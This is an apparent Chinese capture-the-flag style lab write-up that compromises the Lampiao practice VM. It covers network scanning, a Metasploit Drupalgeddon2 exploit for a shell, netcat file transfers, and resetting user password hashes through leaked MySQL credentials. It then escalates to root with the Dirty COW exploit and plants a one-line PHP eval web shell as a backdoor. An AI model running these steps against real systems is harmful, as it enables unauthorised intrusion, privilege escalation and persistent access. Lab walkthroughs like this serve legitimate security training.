3.100个渗透测试实战#3(Lampiao)
目录
一、实验环境
二、实验流程
三、实验步骤
(一)信息收集——主机发现
1.查看kali的网卡和IP信息;(网卡名:eht0;IP:192.168.97.129)
2.查看靶机页面;
3.探测特定网络内的,主机存活状态(netdiscover、arp-scan、nmap)
4.分析所得:
(二)信息收集——端口(服务)扫描
1.扫描端口,以及端口对应的服务信息,以及靶机的操作系统信息
2.分析所得:
(三)渗透测试——80端口(无服务)
1.火狐浏览器,访问主页:http://192.168.97.148
(四)渗透测试——1898端口(http服务)
1.对靶机网站进行目录遍历;
2.在扫描的同时,火狐访问主页http://192.168.97.148:1898
3.尝试访问,robots.txt文件;
4.逐个访问以上扫描出来的以及robots.txt的页面;
5.分析所得:
(五)渗透测试——kali的msf利用drupal的rce漏洞反弹shell
1.进入msf,利用漏洞;
2.从哑shell转换为交互式的完整的shell;(一问一答式的shell)
(六)渗透测试——利用反弹后的shell,进行再一次的信息收集,从而进行本地提权
1.致命连问;
2.分析所得:
3.通过hydra破解ssh服务
4.再次分析:
5.通过mysql数据库,修改tiago、Eder、ADMIN的密码
6.根据以上的提示,用户tiago的密码已经修改为123,我们尝试ssh登录
7.分析所得:
8.后台页面http://192.168.97.148:1898,登录tiago、Eder、ADMIN
(七)渗透测试——尝试脏牛提权(40847.cpp)
1.40847.cpp
(八)渗透测试——清楚痕迹,留下后门,菜刀尝试连接
1.留下1.php
四、总结
1.脏牛提权40847.cpp
2.编译:(转载的编译参数解析)
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为40847
3.执行exp:./40847
执行后的root密码为dirtyCowFun
一、实验环境
- 靶机:Lampiao,IP地址:192.168.97.148
- 测试机:kali,IP地址:192.168.97.129
- 测试机:物理机Win0
- 连接方式:NAT
二、实验流程
- 信息收集——主机发现阶段
- 信息收集——端口(服务)扫描阶段
- 渗透测试——80、1898端口
- 渗透测试——msf利用drupal7的rce漏洞,反弹shell
- 渗透测试——22端口
- 渗透测试——脏牛提权
- 删除痕迹,留下后门
三、实验步骤
(一)信息收集——主机发现
1.查看kali的网卡和IP信息;(网卡名:eht0;IP:192.168.97.129)
2.查看靶机页面;
3.探测特定网络内的,主机存活状态(netdiscover、arp-scan、nmap)
- netdiscover -i eth0 -r 192.168.97.0/24
-i 指定网卡
-r 指定网段
- arp-scan -l
--localnet or -l 指定扫描本地网络
- nmap -sP 192.168.97.0/24
-sP ping扫描且不进行端口扫描
4.分析所得:
- 靶机所在网段为:C段,192.168.97.0/24
- 靶机IP为:192.168.97.148
(二)信息收集——端口(服务)扫描
1.扫描端口,以及端口对应的服务信息,以及靶机的操作系统信息
- nmap -p- -sV -O -A 192.168.97.148
-p- 扫描全端口
-sV 扫描端口对应的服务
-O 扫描靶机的系统版本
-A 扫描靶机的系统版本
2.分析所得:
- 一共扫描65535个端口,65532个端口关闭
- 22端口处于open状态,开启了sshd服务
- 80端口处于open状态,没有开启httpd服务
- 1898端口 处于open状态,开启了httpd服务
- 1898端口,对应的站点为drupal7
靶机的操作系统为:ubuntu、版本在3.2到4.9之间
(三)渗透测试——80端口(无服务)
1.火狐浏览器,访问主页:http://192.168.97.148
f12查看元素信息,或者查看源码,发现没有任何的可用信息
(四)渗透测试——1898端口(http服务)
1.对靶机网站进行目录遍历;
- dirb http://192.168.97.148:1898 /usr/share/dirb/wordlists/big.txt
如下图所示,扫描到了10个目录,2个文件
遇见扫描:http://192.168.97.148:1898
2.在扫描的同时,火狐访问主页http://192.168.97.148:1898
- 主页信息如下,f12查看信息以及查看源码,没有发现有用的信息
- 使用Web指纹识别插件Wapplyzer,识别到该网站的CMS为drupal 7
3.尝试访问,robots.txt文件;
- 浏览器访问:http://192.168.97.148:1898/robots.txt
4.逐个访问以上扫描出来的以及robots.txt的页面;
- 访问结果:都是一些drupal站点的配置文件等等,可以确定这个是Drupal搭建的网站
5.分析所得:
- 获得了一个drupal网站的后台登录页面;
- 该drupal的版本为7,可能存在着免身份认证的RCE漏洞;
- 该drupal搭建的网站,经过浏览器的页面测试,发现了hash加密脚本,以及存在着settings.php配置文件,可以通过该方法,获取后台登录用户名,并且修改后台登录密码;
(五)渗透测试——kali的msf利用drupal的rce漏洞反弹shell
1.进入msf,利用漏洞;
msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.97.148
set rport 1898
exploit
shell
id
2.从哑shell转换为交互式的完整的shell;(一问一答式的shell)
- python -c 'import pty;pty.spawn("/bin/bash")'
(六)渗透测试——利用反弹后的shell,进行再一次的信息收集,从而进行本地提权
1.致命连问;
- whoami
- id
- pwd
- ls -l
如下图所示,我们发现了2个音频,1张图片
- 把两个音频和两张图片nc传输到物理机上查看
发现了其中一个音频提示,user tiago
另外发现一张二维码,使用CQR扫描得到一段鼓励:Try harder! muahuahua
- cat /etc/passwd
- ls -l /home
- cd /home/tiago
- ls
发现该tiago用户下的内容为空
2.分析所得:
- 提示一个用户tiago,但是家目录下无任何可用信息
- 注意,还有一个22端口的ssh,没有用到
3.通过hydra破解ssh服务
- 破解失败
4.再次分析:
- 以上页面访问的时候,得到结果存在settings.php配置文件存放着数据库的连接信息
- 我们可以进入数据库,查看有哪些用户
5.通过mysql数据库,修改tiago、Eder、ADMIN的密码
- 通过find查找settings.php配置文件的位置
注意:默认的settings.php存放位置为/var/www/html/sites/default/settings.php
- cat /var/www/html/sites/default/settings.php
发现了数据库为mysql,数据库名为drupal,数据库连接信息:drupaluser Virgulino
- netstat -pantu查看进程,发现了3306端口,说明MySQL数据库是在运行着的
- mysql -udrupaluser -pVirgulino
- show databases;
- use drupal;
- show tables;
- desc users;
- select uid,name,pass from users;
发现了用户tiago存储着hash加密的密码
- find查找password-hash.sh脚本
该脚本式用来加密的,以便于存储于MySQL数据库中,默认的目录在/var/www/html/scripts/password-hash.sh
- 利用脚本,把123进行hash加密: php scripts/password-hash.sh 123
- 把123对应的hash值存储到MySQL数据库中
6.根据以上的提示,用户tiago的密码已经修改为123,我们尝试ssh登录
7.分析所得:
- 得到一个用户tiago,但是ssh登陆后,无可用的信息
- 还有后台登录没有用到
8.后台页面http://192.168.97.148:1898,登录tiago、Eder、ADMIN
- 没有发现任何的可用信息
(七)渗透测试——尝试脏牛提权(40847.cpp)
1.40847.cpp
- searchsploit dirty cow pri esc
查找脏牛提权的exp
- searchsploit -m 40847.cpp
-m 复制到当前目录下
- nc -lp 8443 < 40847.cpp
kali通过nc把该exp传输到tiago
- nc -nv 192.168.97.129 8443 > 40847.cpp
tiago通过nc接收该40847exp
- 编译40847.cpp:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
- ./40847
运行该exp,运行后root的密码修改为:dirtyCowFun
- su root 切换到root用户
密码dirtyCowFun
- cd /root 切换到root的家目录
- ls
- cat flag.txt
成功获取到flag.txt
(八)渗透测试——清楚痕迹,留下后门,菜刀尝试连接
1.留下1.php
<?php @eval($_POST["123"]);?>
四、总结
1.脏牛提权40847.cpp
2.编译:(转载的编译参数解析)
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为40847
3.执行exp:./40847
执行后的root密码为dirtyCowFun
3.100个渗透测试实战#3(Lampiao)相关推荐
- 《树莓派渗透测试实战》——2.12 用例子总结以上步骤
本节书摘来异步社区<树莓派渗透测试实战>一书中的第2章,第2.12节,作者[美]Joseph Muniz(约瑟夫 穆尼斯) , Aamir Lakhani(阿米尔 拉克哈尼),更多章节内容 ...
- Windows网络服务渗透测试实战-跨网段攻击
一.实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二.实验目的及要求 掌握对跨网段攻击的方法. 熟悉Metasploit终端的使用方法. 熟悉通过meterpreter进行后渗透操作 ...
- 《内网安全攻防:渗透测试实战指南》读书笔记(四):权限提升分析及防御
目录 前言 一.系统内核溢出漏洞提权分析及防范 1.通过手动执行命令发现缺失补丁 (1)MS16-032(KB3139914) 2.利用MSF发现缺失补丁 3.Windows Exploit Sugg ...
- Windows网络服务渗透测试实战MS17-010漏洞复现
一.实验项目名称 Windows网络服务渗透测试实战MS17-010漏洞复现 二.实验目的及要求 熟悉Metasploit终端的使用方法: 掌握对MS17-010漏洞攻击的方法. 三.复现步骤(附加文 ...
- 内部视频放送 |《Python安全攻防:渗透测试实战指南》知识星球
如果你立志成为一名合格的安全从业者,想突破"脚本小子"的瓶颈,成为真正的黑客,想拥有自己打造出来的属于自己的神兵利器!<Python安全攻防:渗透测试实战指南>马上就要 ...
- 《树莓派渗透测试实战》——2.7 设置SSH服务
本节书摘来自异步社区<树莓派渗透测试实战>一书中的第2章,第2.7节,作者[美]Joseph Muniz(约瑟夫 穆尼斯),Aamir Lakhani(阿米尔 拉克哈尼),朱筱丹 译,更多 ...
- 《树莓派渗透测试实战》——总结
本节书摘来异步社区<树莓派渗透测试实战>一书中的第1章,作者 [美]Joseph Muniz(约瑟夫 穆尼斯) , Aamir Lakhani(阿米尔 拉克哈尼),更多章节内容可以访问云栖 ...
- 【渗透测试实战】PHP语言有哪些后门?以及利用方法
目录 后门 php.ini构成的后门 .user.ini文件构成的PHP后门 反序列化 PHP序列化实现 常见处理器 序列化格式 private与protect PHP反序列化漏洞 利用点 SoapC ...
- web渗透测试实战-SQLMAP
一.实验项目名称 web渗透测试实战-SQLMAP 二.实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用. 1.获取数据库信息:数据库漏洞.数据库名.数据库版本等 python sql ...
最新文章
- 1677: [Usaco2005 Jan]Sumsets 求和
- (52 90) 简答 什么叫计算机网络,计算机网络期末复习试卷.doc
- css实验内容,12个令人惊叹的CSS实验项目
- pthread调度策略,优先级和竞争范围
- IOS之导航控制器与表视图
- 带你探索CPU调度的奥秘
- adb 51 android.rules,使用51-android-rules解决ubuntu上不识别 android手机的问题
- ASP.NET异常全记录-----回发或回调参数无效
- centos sokit_手把手教你在centos上配置Django项目(超详细步骤)
- Supervised Contrastive Learning:有监督对比学习
- 零和博弈思维模式:选择即博弈,无法逃脱的思想牢笼
- [情感] 纯情女生给老实木讷男孩的恋爱建议
- 硬件设计之一——电源设计02:DCDC设计
- C语言人五英尺七英寸,“5英尺7英寸”等于多少厘米
- 向日葵iOS主控端7.2发布:iPhone远程桌面 鼠标指针、触控任性操作
- Android10无法访问根目录文件解决
- 绝对位置运动指令(MoveAbsJ)
- 基于51单片机智能可控洗衣机控制系统设计
- FPGA学习前导:FPGA/CPLD简介
- 算法竞赛——强连通分量
热门文章
- [Android 9][markw] 红米4高配版 刷入Lineage OS 16与OpenGApps
- 无线认证web认证服务器,wifi web认证服务器地址
- ubuntu中安装oracle sun java.
- GitHub 上100个优质前端项目整理,非常全面!
- 硬件安全技术——芯片安全设计技术1
- 炉石传说服务器维修,《炉石》服务器崩溃,全部被强制回档,玩家损失几百万!...
- HBuilder X 无法启动微信开发者工具问题解决方法
- 主机开启后,显示器显示NO SIGNAL,无信号
- 树莓派外接显示器黑屏_解决树莓派连接显示屏No Signal的问题
- 2017146期计算机开机号,[彩吧]福彩3D17147期开机号103